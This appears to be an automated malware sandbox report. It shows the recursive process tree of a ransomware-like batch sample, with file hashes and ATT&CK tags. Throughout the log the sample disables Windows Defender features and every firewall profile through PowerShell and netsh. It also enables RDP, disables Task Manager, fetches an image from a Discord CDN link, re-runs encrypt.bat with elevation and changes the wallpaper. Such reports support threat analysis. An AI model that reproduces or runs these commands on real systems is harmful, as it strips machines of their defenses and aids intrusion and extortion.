depth 72 | PID:3716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 72 | PID:4040 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 72 | PID:1000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 72 | PID:2212 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 72 | PID:4984 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | Modifies Windows Firewall
depth 72 | PID:1872 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | Modifies Windows Firewall
depth 72 | PID:2412 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 72 | PID:4236 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 72 | PID:3412 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 72 | PID:4508 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 72 | PID:712 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 72 | PID:3024 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 72 | PID:3548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 72 | PID:1512 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 72 | PID:2920 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 72 | PID:1796 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 72 | PID:448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell
depth 72 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
- Command and Scripting Interpreter: PowerShell
PID:244 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"73⤵PID:4384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV174⤵PID:4432
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"74⤵PID:1788
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f74⤵PID:2100
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"74⤵PID:3380
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f74⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:2996
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable74⤵PID:1632
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE74⤵PID:3416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off74⤵
- Modifies Windows Firewall
PID:2384
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off74⤵PID:4376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off74⤵PID:3552
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off74⤵
- Modifies Windows Firewall
PID:2800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off74⤵PID:264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"74⤵PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"74⤵
- Blocklisted process makes network request
PID:1236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"74⤵
- Command and Scripting Interpreter: PowerShell
PID:2072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"75⤵PID:4936
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"76⤵PID:1108
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f76⤵PID:3056
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"76⤵PID:3240
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f76⤵PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:2508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:3556
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable76⤵PID:204
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE76⤵PID:700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off76⤵PID:4244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off76⤵PID:3064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off76⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off76⤵
- Modifies Windows Firewall
PID:2684
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off76⤵PID:4756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"76⤵PID:1836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"76⤵PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"76⤵PID:444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"76⤵PID:1356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"76⤵PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"76⤵PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"76⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"76⤵
- Command and Scripting Interpreter: PowerShell
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"77⤵PID:2928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV178⤵PID:4884
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f76⤵PID:2744
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f74⤵
- Sets desktop wallpaper using registry
PID:4184
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters74⤵PID:3564
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f72⤵
- Sets desktop wallpaper using registry
PID:4436
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters72⤵PID:2488
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f70⤵
- Sets desktop wallpaper using registry
PID:4236
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters70⤵PID:1232
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f68⤵
- Sets desktop wallpaper using registry
PID:3036
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters68⤵PID:720
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f66⤵
- Sets desktop wallpaper using registry
PID:2872
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters66⤵PID:5036
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f64⤵
- Sets desktop wallpaper using registry
PID:5000
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters64⤵PID:3180
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f62⤵
- Sets desktop wallpaper using registry
PID:912
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters62⤵PID:4512
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f60⤵
- Sets desktop wallpaper using registry
PID:3088
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters60⤵PID:2672
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f58⤵
- Sets desktop wallpaper using registry
PID:4384
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters58⤵PID:4512
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f56⤵
- Sets desktop wallpaper using registry
PID:720
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters56⤵PID:4884
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f54⤵
- Sets desktop wallpaper using registry
PID:4444
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters54⤵PID:2012
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f52⤵
- Sets desktop wallpaper using registry
PID:620
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters52⤵PID:3524
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f50⤵
- Sets desktop wallpaper using registry
PID:2744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters50⤵PID:4300
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f48⤵
- Sets desktop wallpaper using registry
PID:1532
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters48⤵PID:4084
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f46⤵
- Sets desktop wallpaper using registry
PID:4784
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters46⤵PID:3088
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f44⤵
- Sets desktop wallpaper using registry
PID:764
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters44⤵PID:3260
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f42⤵
- Sets desktop wallpaper using registry
PID:2912
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters42⤵PID:4904
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f40⤵
- Sets desktop wallpaper using registry
PID:4820
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters40⤵PID:3824
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f38⤵
- Sets desktop wallpaper using registry
PID:2212
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters38⤵PID:4152
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f36⤵
- Sets desktop wallpaper using registry
PID:2744
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters36⤵PID:1236
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f34⤵
- Sets desktop wallpaper using registry
PID:4856
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters34⤵PID:4512
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f32⤵
- Sets desktop wallpaper using registry
PID:2072
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters32⤵PID:792
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵
- Sets desktop wallpaper using registry
PID:2288
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:1532
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:4180
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:460
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:460
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:528
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵
- Sets desktop wallpaper using registry
PID:2228
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters24⤵PID:2432
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f22⤵
- Sets desktop wallpaper using registry
PID:532
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters22⤵PID:2228
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f20⤵
- Sets desktop wallpaper using registry
PID:3340
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters20⤵PID:3856
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f18⤵
- Sets desktop wallpaper using registry
PID:3336
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters18⤵PID:2292
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f16⤵
- Sets desktop wallpaper using registry
PID:4152
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters16⤵PID:3540
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f14⤵
- Sets desktop wallpaper using registry
PID:2780
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters14⤵PID:2396
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f12⤵
- Sets desktop wallpaper using registry
PID:2264
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters12⤵PID:3008
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f10⤵
- Sets desktop wallpaper using registry
PID:4196
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters10⤵PID:1456
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f8⤵
- Sets desktop wallpaper using registry
PID:4284
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters8⤵PID:3240
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f6⤵
- Sets desktop wallpaper using registry
PID:2120
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters6⤵PID:620
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f4⤵
- Sets desktop wallpaper using registry
PID:4208
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:668
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4636
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3512
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:796
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2772
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3256
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4456
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4856
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1276
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3640
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3524
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2220
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: 7a2773f461b2f4672ceb202de1104e08
  SHA1: cbcab3b011eddb0b5af6dcfee171511efc2bb9c3
  SHA256: 522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695
  SHA512: df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b
- Filesize: 1KB
  MD5: 60722a327960e4b4f5d967101a72ed06
  SHA1: 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
  SHA256: 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
  SHA512: 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896
- Filesize: 3KB
  MD5: ad5cd538ca58cb28ede39c108acb5785
  SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
- Filesize: 74KB
  MD5: d4fc49dc14f63895d997fa4940f24378
  SHA1: 3efb1437a7c5e46034147cbbc8db017c69d02c31
  SHA256: 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
  SHA512: cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
- Filesize: 1KB
  MD5: 0648a1778be3a688ddfdc7ce413138ba
  SHA1: e07e38b4ac7af1b589cc39c9e563a8a25a1830d3
  SHA256: 4f8ad8987762f761deacf05cd7caeb8d6a04a6cbb73ff66d6d2a33d6d2e2c578
  SHA512: f3e59f34e745a77ab31fb227294636ec6a3d27a21a0b4b863cb9b4804f89a2717ce13ba32a6ec11744010e9a4e8a8b09cf16743823167a55488157b22c45f1f5
- Filesize: 1KB
  MD5: cccdea27e371e720e3eb2f4d981e89f2
  SHA1: 3a498a0242d0b0b910140e27cccce65fbcd04d42
  SHA256: a0169768dd782490558bc9591662e75864d9ce0093186aa37d44a48a257ebb45
  SHA512: 12f3af62274d1e8d99d575a6d3be6c9d74051e8a17fd60d3635470ca4de8ec697d7440d776317931d56985292d07dd605fc01e16d14c2ceca290a3cb827f2da0
- Filesize: 1KB
  MD5: 7ef4e2edd4b7175d2d0c5ce3a853d5bd
  SHA1: 6ce63dab1dfbaecd3d55fff5ba0a14012811bd71
  SHA256: 4a6772292ad97cabfc8cba04dd30336a5c77ee196a288c6093a12ca3b9a575a0
